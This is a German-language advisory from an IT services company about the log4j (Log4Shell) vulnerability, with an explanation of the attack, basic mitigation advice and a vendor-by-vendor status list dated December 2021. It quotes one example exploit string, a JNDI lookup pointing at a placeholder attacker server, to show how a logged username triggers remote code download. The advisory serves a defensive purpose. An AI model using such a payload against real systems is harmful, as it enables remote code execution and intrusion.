Uns erreichen vermehrt Anfragen zur log4j-Schwachstelle und konkrete Hilfeersuchen zur Mitigierung der Schwachstelle. Dieser Artikel soll Ihnen grundlegende Informationen zur Schwachstelle liefern und mögliche Anlaufstellen zur Hilfestellung geben.
Sofern Sie einen mentIQ Supportvertrag haben, können Sie sich direkt über unser Portal an das mentIQ-Support-Team wenden. Sie erhalten dort Antworten auf Ihre Fragen und Hilfestellung.
Haftungsausschluss:
Diese Informationen geben Hilfestellungen, um sich vor den Angriffsmöglichkeiten, die durch log4j entstehen, zu schützen, sind aber keine Garantie auf Vollständigkeit. Die mentIQ GmbH lehnt jede Gewährleistung auf Vollständigkeit der Informationen oder Konsequenzen, die durch die Anwendung oder Nicht-Anwendung der Hilfestellungen entstehen, ab.
Was die log4j-Schwachstelle so gefährlich macht
Zur Einordnung der Bedrohungslage: Das Bundesamt für Sicherheit in der Informationstechnik stuft die log4j-Schwachstelle als „extrem kritisch“ ein.
Auf den folgenden Webseiten ist beschrieben, wie log4j ausgenutzt werden kann um in ein Netzwerk einzudringen:
Log4Shell : JNDI Injection via Attackable Log4J - Security Boulevard
Javarevisited auf Twitter: "Log4j issue 101 https://t.co/gcDmSWVm8M" / Twitter
Vereinfach soll dies an folgendem Bild erklärt werden:
Quelle: https://securityboulevard.com/2021/12/log4shell-jndi-injection-via-attackable-log4j/
Ein Hacker sendet einen „Attacker Controlled Request“ an eine Applikation die log4j verwendet. Die Applikation muss dann dazu bewegt werden, diesen Request zu „loggen“. Das kann zum Beispiel passieren, wenn man sich mit einem falschen Usernamen versucht anzumelden, dann protokollieren im Allgemeinen Applikationen diesen fälschlichen Usernamen im Log. Sendet man nun als Usernamen den Exploit (der zB. so aussehen kann: ${jndi:ldap://attackerserver.com:1389/ExploitPayload}), dann wird log4j versuchen auf attackerserver.com zuzugreifen und den gefährlichen Code nachladen. Der Download wird üblicherweise über das Internet stattfinden und der Server wird vom Hacker gehostet sein – „Hacker hosted“. Dass hier LDAP verwendet wird hat nichts mit Active Directory zu tun, sondern ist die Eigenschaft des Exploits, der das LDAP Protokoll zum Transport der Schadsoftware verwendet.
Die größte Angriffsfläche bieten daher Webserver/Applikationen und APIs aller Art, die direkt im Internet stehen. Diese sind von extern direkt erreichbar und haben auch selbst Internetzugriff und können den Download ausführen! Systeme die nur im Intranet erreichbar sind, sind weit weniger angreifbar. Man kann sich aber theoretisch vorstellen, dass ein „Interner Hacker“ einen eigenen LDAP Hacker Server hostet und dann versucht intern die Applikationen abzuscannen. Das ist weit unwahrscheinlicher, aber dennoch möglich. Daher sollte man versuchen Lücken zu schließen und die Systeme zu Patchen, sobald die Hersteller die Updates bereitstellen.
Generelle Hilfestellung:
Systeme sollten nicht vom Internet erreichbar sein und auch nicht direkt ins Internet kommunizieren können. Schützt aber nicht vor internen Angriffen aus dem eigenen Netzwerk.
Linkliste Hersteller
Die im Folgenden genannten Produkte sind nur ein Auszug aus den Links zu den Herstellerseiten, bitte folgen Sie diesen, um die vollständige Information zu erhalten.
Stand: 14.12.2021, 10:50 Uhr
Broadcom (Brocade)
Brocade Fabric OS 7.4 und 8.x nicht verwundbar, Fabric OS 9.x nicht betroffen.
SANnav 2.1.1. ist verwundbar
Cloudian
Alle Versionen von HyperStore sind betroffen.
https://cloudian-support.force.com/s/article/SECURITY-Upgrade-Log4j-library-for-CVE-2021-44228
Dell
Data Domain, NetWorker, Avamar und PPDM sind betroffen, Patches pending.
NetApp
Data ONTAP ist nicht betroffen.
https://security.netapp.com/advisory/ntap-20211210-0007/
Pure Storage
Alle Purity-OE-basierten Produkte sind betroffen (FlashArray, FlashBlade, Cloud Blockstore)
Quantum
Eine Stellungnahme ist noch nicht verfügbar, wird aber bei Verfügbarkeit hier veröffentlicht.
https://www.quantum.com/en/service-support/service-bulletins/
Veeam
Veeam-Produkte sind nicht betroffen, log4j wird nicht genutzt.
VMware
ESX und vCenter sind angreifbar, ein Patch ist "pending" (Stand 2021-12-14)
https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Allgemein Informationen zur log4j-Schwachstelle
BSI
Kritische Schwachstelle in log4j veröffentlicht (CVE-2021-44228)
Microsoft
Hilfe um die Schwachstelle zu verhindern, zu erkennen und zu finden
NSCN-NL (niederländisches Cyber Sicherheitszentrum)
Liste von Software-Produkten und des Status hinsichtlich der Verwundbarkeit durch die log4j-Schwachstelle